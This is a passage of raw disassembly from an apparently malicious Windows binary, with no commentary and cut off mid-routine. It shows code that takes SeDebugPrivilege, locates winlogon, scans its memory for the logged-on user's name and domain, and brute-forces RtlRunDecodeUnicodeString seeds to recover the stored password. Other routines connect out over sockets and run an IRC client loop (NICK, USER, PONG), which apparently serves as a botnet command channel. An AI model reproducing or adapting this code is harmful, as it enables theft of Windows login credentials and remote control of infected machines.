jz short loc_4178AB
push offset unk_44EB80
jmp loc_4179EA
; ---------------------------------------------------------------------------
loc_4178AB: ; CODE XREF: sub_41786C+2E�j
; sub_41786C+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41A2C9
pop ecx
test eax, eax
pop ecx
jz loc_4179E5
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:off_4F538C
mov esi, ds:off_4F5390
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; sub_50B076
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov ds:dword_4EBE3C, eax
call esi ; sub_50B076
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov ds:dword_4EBE30, eax
call esi ; sub_50B076
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov ds:dword_4EC040, eax
call esi ; sub_50B076
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov ds:dword_4EBE38, eax
call esi ; sub_50B076
mov ds:dword_4EBE34, eax
call sub_417A3E
test eax, eax
mov [ebp+arg_0], eax
jz loc_4179B8
mov esi, ds:dword_4F52D4
mov edi, 400h
mov ebx, offset dword_4EAE30
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_4EB630
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_4EC044
push [ebp+arg_0]
jnz short loc_417964
call sub_417BC7
jmp short loc_417969
; ---------------------------------------------------------------------------
loc_417964: ; CODE XREF: sub_41786C+EF�j
call sub_417D6B
loc_417969: ; CODE XREF: sub_41786C+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_4179B1
cmp ds:dword_4EC044, 0
jnz short loc_417998
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+var_29C]
push offset unk_44EC90
push 200h
push eax
call sub_41EC30
add esp, 18h
jmp short loc_4179CB
; ---------------------------------------------------------------------------
loc_417998: ; CODE XREF: sub_41786C+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_4179A8
call sub_417E98
jmp short loc_4179AD
; ---------------------------------------------------------------------------
loc_4179A8: ; CODE XREF: sub_41786C+133�j
call sub_417F2F
loc_4179AD: ; CODE XREF: sub_41786C+13A�j
pop ecx
push eax
jmp short loc_4179BD
; ---------------------------------------------------------------------------
loc_4179B1: ; CODE XREF: sub_41786C+101�j
push offset unk_44ECEC
jmp short loc_4179BD
; ---------------------------------------------------------------------------
loc_4179B8: ; CODE XREF: sub_41786C+B6�j
push offset unk_44ED24
loc_4179BD: ; CODE XREF: sub_41786C+143�j
; sub_41786C+14A�j
lea eax, [ebp+var_29C]
push eax
call sub_41EA60
pop ecx
pop ecx
loc_4179CB: ; CODE XREF: sub_41786C+12A�j
push 0
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
call sub_41A2C9
pop ecx
pop ecx
push [ebp+var_8]
call ds:off_4F5410
pop ebx
jmp short loc_4179F8
; ---------------------------------------------------------------------------
loc_4179E5: ; CODE XREF: sub_41786C+4E�j
push offset unk_44ED64
loc_4179EA: ; CODE XREF: sub_41786C+3A�j
lea eax, [ebp+var_29C]
push eax
call sub_41EA60
pop ecx
pop ecx
loc_4179F8: ; CODE XREF: sub_41786C+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_417A1F
push esi
lea eax, [ebp+var_29C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_409C75
add esp, 14h
loc_417A1F: ; CODE XREF: sub_41786C+191�j
lea eax, [ebp+var_29C]
push eax
call sub_415A3C
push [ebp+var_18]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_41786C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417A3E proc near ; CODE XREF: sub_41786C+AC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_4F541C
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4F5418
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call ds:dword_4EBE3C
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call ds:dword_4EBE3C
test eax, eax
jnz short loc_417B2B
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_417B2B
xor ecx, ecx
mov ebx, ebp
inc ecx
cmp eax, ecx
mov [esp+28h+var_18], ecx
jb short loc_417B2B
loc_417AC7: ; CODE XREF: sub_417A3E+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_417B1E
push 0
push 0
call ds:dword_4EBE30
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call ds:dword_4EC040
test eax, eax
jnz short loc_417B0F
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax
call sub_421620
pop ecx
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_417B43
loc_417B0F: ; CODE XREF: sub_417A3E+AA�j
test edi, edi
jz short loc_417B1A
push edi
call ds:dword_4EBE38
loc_417B1A: ; CODE XREF: sub_417A3E+D3�j
mov eax, [esp+28h+var_10]
loc_417B1E: ; CODE XREF: sub_417A3E+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_417AC7
loc_417B2B: ; CODE XREF: sub_417A3E+6D�j
; sub_417A3E+7A�j ...
xor edi, edi
loc_417B2D: ; CODE XREF: sub_417A3E+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov eax, edi
loc_417B3B: ; CODE XREF: sub_417A3E+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_417B43: ; CODE XREF: sub_417A3E+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_417BAC
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_417B59: ; CODE XREF: sub_417A3E+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_421620
pop ecx
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_417BC0
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_421620
pop ecx
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jnz short loc_417B9E
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_417B9E: ; CODE XREF: sub_417A3E+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_417B59
loc_417BAC: ; CODE XREF: sub_417A3E+10F�j
test edi, edi
jz short loc_417BB7
push edi
call ds:dword_4EBE38
loc_417BB7: ; CODE XREF: sub_417A3E+170�j
mov edi, [esp+28h+var_4]
jmp loc_417B2D
; ---------------------------------------------------------------------------
loc_417BC0: ; CODE XREF: sub_417A3E+13C�j
xor eax, eax
jmp loc_417B3B
sub_417A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417BC7 proc near ; CODE XREF: sub_41786C+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call ds:dword_4F5358 ; OpenProcess
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_417BF0
xor eax, eax
jmp loc_417D68
; ---------------------------------------------------------------------------
loc_417BF0: ; CODE XREF: sub_417BC7+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call ds:dword_4F5428 ; GetSystemInfo
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, ds:dword_4F541C
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4F5418
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, ds:dword_4F5424
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_417C40
xor esi, esi
jmp loc_417D5B
; ---------------------------------------------------------------------------
loc_417C40: ; CODE XREF: sub_417BC7+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call ds:dword_4F5420 ; VirtualQueryEx
test eax, eax
jz loc_417D4A
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_417D4A
test [ebp+var_2B], 1
jnz loc_417D4A
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_417D4A
loc_417CA3: ; CODE XREF: sub_417BC7+110�j
push edi
push offset dword_4EAE30
call sub_43ACF0
pop ecx
test eax, eax
pop ecx
jnz short loc_417CCB
lea eax, [edi+200h]
push eax
push offset dword_4EB630
call sub_43ACF0
pop ecx
test eax, eax
pop ecx
jz short loc_417CDB
loc_417CCB: ; CODE XREF: sub_417BC7+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jb short loc_417CA3
jmp short loc_417D4A
; ---------------------------------------------------------------------------
loc_417CDB: ; CODE XREF: sub_417BC7+102�j
test edi, edi
jz short loc_417D4A
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_4F53E8 ; FileTimeToLocalFileTime
test eax, eax
jz short loc_417D16
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call ds:dword_4F53E4 ; FileTimeToSystemTime
test eax, eax
jz short loc_417D16
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_417D16: ; CODE XREF: sub_417BC7+12B�j
; sub_417BC7+13D�j
movzx eax, byte ptr [edi+42Dh]
mov ds:dword_4EC050, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov ds:dword_4EC048, eax
mov ds:dword_4EC04C, edi
loc_417D4A: ; CODE XREF: sub_417BC7+90�j
; sub_417BC7+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov esi, [ebp+var_10]
loc_417D5B: ; CODE XREF: sub_417BC7+74�j
push [ebp+var_4]
call ds:off_4F533C
pop edi
mov eax, esi
pop ebx
loc_417D68: ; CODE XREF: sub_417BC7+24�j
pop esi
leave
retn
sub_417BC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417D6B proc near ; CODE XREF: sub_41786C:loc_417964�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push [ebp+arg_0]
push 0
push 410h
call ds:dword_4F5358 ; OpenProcess
test eax, eax
mov [ebp+arg_0], eax
jnz short loc_417D8A
leave
retn
; ---------------------------------------------------------------------------
loc_417D8A: ; CODE XREF: sub_417D6B+1B�j
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call ds:dword_4F5428 ; GetSystemInfo
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_417E52
mov edi, ds:dword_4F541C
loc_417DB4: ; CODE XREF: sub_417D6B+E1�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call ds:dword_4F5420 ; VirtualQueryEx
test eax, eax
jz short loc_417E40
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_417E46
test [ebp+var_13], 1
jnz short loc_417E46
push ecx
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call ds:dword_4F5424 ; ReadProcessMemory
test eax, eax
jz short loc_417E32
push offset dword_4EAE30
push esi
call sub_43ACF0
pop ecx
test eax, eax
pop ecx
jnz short loc_417E32
lea eax, [esi+400h]
push offset dword_4EB630
push eax
call sub_43ACF0
pop ecx
test eax, eax
pop ecx
jz short loc_417E64
loc_417E32: ; CODE XREF: sub_417D6B+9D�j
; sub_417D6B+AE�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
jmp short loc_417E46
; ---------------------------------------------------------------------------
loc_417E40: ; CODE XREF: sub_417D6B+5B�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_417E46: ; CODE XREF: sub_417D6B+6F�j
; sub_417D6B+75�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_417DB4
loc_417E52: ; CODE XREF: sub_417D6B+3D�j
xor esi, esi
loc_417E54: ; CODE XREF: sub_417D6B+12B�j
push [ebp+arg_0]
call ds:off_4F533C
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_417E64: ; CODE XREF: sub_417D6B+C5�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov ds:dword_4EC048, ebx
mov ds:dword_4EC04C, eax
cmp [eax], cl
jnz short loc_417E86
cmp [eax+1], cl
jz short loc_417E8E
loc_417E86: ; CODE XREF: sub_417D6B+114�j
; sub_417D6B+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_417E86
loc_417E8E: ; CODE XREF: sub_417D6B+119�j
mov eax, [ebp+arg_4]
xor esi, esi
inc esi
mov [eax], ecx
jmp short loc_417E54
sub_417D6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417E98 proc near ; CODE XREF: sub_41786C+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_4EC044
push esi
mov esi, ds:dword_4F541C
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
mov ecx, ds:dword_4EC044
mov [ebp+var_4], eax
add ecx, ecx
push ecx
push ds:dword_4EC04C
push eax
call sub_41FBF0
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr ds:dword_4EC050
push eax
call ds:dword_4EBE34
push [ebp+var_4]
mov edi, offset dword_4EBE40
push offset dword_4EAE30
push offset dword_4EB630
push [ebp+arg_0]
push offset dword_44EDB8
push 200h
push edi
call sub_41EC30
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_417E98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F2F proc near ; CODE XREF: sub_41786C:loc_4179A8�p
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_4EC044
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call ds:dword_4F541C ; GetProcessHeap
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+var_14], eax
mov ebx, offset dword_4EB630
mov edi, 200h
mov esi, offset dword_4EAC30
loc_417F75: ; CODE XREF: sub_417F2F+FA�j
mov eax, ds:dword_4EC044
add eax, eax
push eax
push ds:dword_4EC04C
push [ebp+var_14]
call sub_41FBF0
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call ds:dword_4EBE34
mov eax, ds:dword_4EC044
and [ebp+var_10], 0
mov ecx, [ebp+var_14]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_417FEA
loc_417FB2: ; CODE XREF: sub_417F2F+B3�j
cmp [ebp+var_8], 0
jz short loc_418007
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_417FD6
cmp byte ptr [ecx+1], 0
jnz short loc_417FD6
cmp dl, 20h
jnb short loc_417FD0
and [ebp+var_8], 0
loc_417FD0: ; CODE XREF: sub_417F2F+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_417FDA
loc_417FD6: ; CODE XREF: sub_417F2F+90�j
; sub_417F2F+96�j
and [ebp+var_8], 0
loc_417FDA: ; CODE XREF: sub_417F2F+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_417FB2
cmp [ebp+var_8], 0
jz short loc_418007
loc_417FEA: ; CODE XREF: sub_417F2F+81�j
push [ebp+var_14]
push offset dword_4EAE30
push ebx
push [ebp+arg_0]
push offset dword_44EE08
push edi
push esi
call sub_41EC30
add esp, 1Ch
jmp short loc_41801F
; ---------------------------------------------------------------------------
loc_418007: ; CODE XREF: sub_417F2F+87�j
; sub_417F2F+B9�j
push offset dword_4EAE30
push ebx
push [ebp+arg_0]
push offset dword_44EE58
push edi
push esi
call sub_41EC30
add esp, 18h
loc_41801F: ; CODE XREF: sub_417F2F+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_417F75
push [ebp+var_14]
push 0
call ds:dword_4F541C ; GetProcessHeap
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_417F2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418048 proc near ; CODE XREF: sub_41820B+2F�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call ds:dword_4E3048 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_4180C4
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call ds:dword_4E2FC8 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call ds:dword_4E3008 ; inet_addr
cmp eax, esi
jnz short loc_4180A9
push [ebp+arg_0]
call ds:dword_4E304C ; gethostbyname
test eax, eax
jz short loc_4180C4
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_4180A9: ; CODE XREF: sub_418048+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_4E2F70 ; connect
cmp eax, esi
jnz short loc_4180C8
push edi
call ds:dword_4E3060 ; closesocket
loc_4180C4: ; CODE XREF: sub_418048+1B�j
; sub_418048+58�j
mov eax, esi
jmp short loc_4180CA
; ---------------------------------------------------------------------------
loc_4180C8: ; CODE XREF: sub_418048+73�j
mov eax, edi
loc_4180CA: ; CODE XREF: sub_418048+7E�j
pop edi
pop esi
leave
retn
sub_418048 endp
; =============== S U B R O U T I N E =======================================
sub_4180CE proc near ; CODE XREF: sub_401C87+3298�p
; sub_401C87+3301�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push offset asc_44FA88 ; "\n "
push edi
call sub_41F630
pop ecx
mov esi, offset dword_4EC05C
pop ecx
loc_4180E6: ; CODE XREF: sub_4180CE+42�j
cmp dword ptr [esi-4], 1
jnz short loc_418104
cmp dword ptr [esi], 0
jbe short loc_418104
push 0
push edi
call sub_41BC70
pop ecx
push eax
push edi
push dword ptr [esi]
call ds:dword_4E3018 ; send
loc_418104: ; CODE XREF: sub_4180CE+1C�j
; sub_4180CE+21�j
add esi, 210h
cmp esi, offset byte_4F277C
jl short loc_4180E6
pop edi
pop esi
retn
sub_4180CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418115 proc near ; CODE XREF: sub_41820B+14F�p
var_420 = byte ptr -420h
var_220 = byte ptr -220h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push esi
push edi
push 44FA8Ah
push [ebp+arg_0]
call sub_41F870
xor esi, esi
pop ecx
inc esi
pop ecx
mov [ebp+var_20], eax
xor edi, edi
loc_418137: ; CODE XREF: sub_418115+37�j
push 44FA8Ch
push edi
call sub_41F870
mov [ebp+esi*4+var_20], eax
inc esi
pop ecx
cmp esi, 8
pop ecx
jl short loc_418137
cmp [ebp+var_20], edi
mov esi, [ebp+var_1C]
jnz short loc_418162
cmp esi, edi
jnz short loc_418162
xor eax, eax
inc eax
jmp loc_418207
; ---------------------------------------------------------------------------
loc_418162: ; CODE XREF: sub_418115+3F�j
; sub_418115+43�j
push [ebp+var_20]
push offset aPing_1 ; "PING"
call sub_41F7E0
pop ecx
pop ecx
test eax, eax
push esi
jnz short loc_41818C
lea eax, [ebp+var_220]
push offset aPongS_0 ; "PONG %s\n"
push eax
call sub_41EA60
add esp, 0Ch
jmp short loc_4181E6
; ---------------------------------------------------------------------------
loc_41818C: ; CODE XREF: sub_418115+5F�j
push offset a433_0 ; "433"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_4181AD
push esi
push offset a432 ; "432"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_418205
loc_4181AD: ; CODE XREF: sub_418115+85�j
push 200h
lea eax, [ebp+var_420]
push edi
push eax
call sub_41E4B0
lea eax, [ebp+var_420]
push eax
call sub_418428
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_220]
push offset aNickS_5 ; "NICK %s\n"
push eax
call sub_41EA60
add esp, 1Ch
loc_4181E6: ; CODE XREF: sub_418115+75�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
loc_418205: ; CODE XREF: sub_418115+96�j
xor eax, eax
loc_418207: ; CODE XREF: sub_418115+48�j
pop edi
pop esi
leave
retn
sub_418115 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41820B proc near ; DATA XREF: sub_4183AA+61�o
var_4008 = byte ptr -4008h
var_3008 = byte ptr -3008h
var_2008 = byte ptr -2008h
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call sub_41EF80
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
imul esi, 210h
xor edi, edi
push ds:dword_4EC264[esi]
lea eax, dword_4EC064[esi]
inc edi
push eax
mov ds:dword_4EC058[esi], edi
call sub_418048
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov ds:dword_4EC05C[esi], eax
jb loc_41838A
mov edi, 1000h
lea eax, [ebp+var_2008]
push edi
push ebx
push eax
call sub_41E4B0
lea eax, [ebp+var_2008]
push eax
call sub_418428
lea eax, [ebp+var_4008]
push eax
call sub_418428
lea eax, [ebp+var_3008]
push eax
call sub_418428
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+var_4008]
push eax
lea eax, [ebp+var_2008]
push eax
lea eax, [ebp+var_1008]
push offset aNickSUserSHotm ; "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
push eax
call sub_41EA60
add esp, 2Ch
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push ds:dword_4EC05C[esi]
call ds:dword_4E3018 ; send
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
loc_4182E4: ; CODE XREF: sub_41820B+17A�j
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_1008]
push ebx
push edi
push eax
push ds:dword_4EC05C[esi]
call ds:dword_4E2FE0 ; recv
cmp eax, ebx
mov [ebp+var_8], eax
jle short loc_41838A
xor eax, eax
cmp [ebp+var_8], ebx
jmp short loc_418380
; ---------------------------------------------------------------------------
loc_418318: ; CODE XREF: sub_41820B+178�j
mov al, [ebp+eax+var_1008]
cmp al, 0Dh
jz short loc_41833F
cmp al, 0Ah
jz short loc_41833F
cmp [ebp+arg_0], 0FA0h
jz short loc_41833F
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+var_2008], al
jmp short loc_418379
; ---------------------------------------------------------------------------
loc_41833F: ; CODE XREF: sub_41820B+116�j
; sub_41820B+11A�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_418379
push ds:dword_4EC05C[esi]
mov [ebp+eax+var_2008], bl
lea eax, [ebp+var_2008]
push eax
call sub_418115
pop ecx
test eax, eax
pop ecx
ja short loc_41838A
push edi
lea eax, [ebp+var_2008]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_418379: ; CODE XREF: sub_41820B+132�j
; sub_41820B+139�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
loc_418380: ; CODE XREF: sub_41820B+10B�j
mov [ebp+var_4], eax
jnz short loc_418318
jmp loc_4182E4
; ---------------------------------------------------------------------------
loc_41838A: ; CODE XREF: sub_41820B+40�j
; sub_41820B+104�j ...
mov ds:dword_4EC058[esi], ebx
mov esi, ds:dword_4EC05C[esi]
cmp esi, ebx
jbe short loc_4183A1
push esi
call ds:dword_4E3060 ; closesocket
loc_4183A1: ; CODE XREF: sub_41820B+18D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_41820B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4183AA proc near ; CODE XREF: sub_401C87+31EB�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
mov [ebp+var_4], ebx
jle short loc_418423
loc_4183BC: ; CODE XREF: sub_4183AA+77�j
xor edi, edi
mov eax, offset dword_4EC058
loc_4183C3: ; CODE XREF: sub_4183AA+28�j
cmp [eax], ebx
jz short loc_4183D4
add eax, 210h
inc edi
cmp eax, offset byte_4F2778
jl short loc_4183C3
loc_4183D4: ; CODE XREF: sub_4183AA+1B�j
cmp edi, 31h
jz short loc_418423
mov esi, edi
push [ebp+arg_0]
imul esi, 210h
lea eax, dword_4EC064[esi]
push eax
call sub_41F620
mov eax, [ebp+arg_4]
pop ecx
mov ds:dword_4EC264[esi], eax
pop ecx
lea eax, [ebp+var_8]
mov ds:dword_4EC058[esi], 1
push eax
push ebx
push edi
push offset sub_41820B
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_4183BC
loc_418423: ; CODE XREF: sub_4183AA+10�j
; sub_4183AA+2D�j
pop edi
pop esi
pop ebx
leave
retn
sub_4183AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418428 proc near ; CODE XREF: sub_401C87+373E�p
; sub_401C87+3781�p ...
var_40 = byte ptr -40h
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
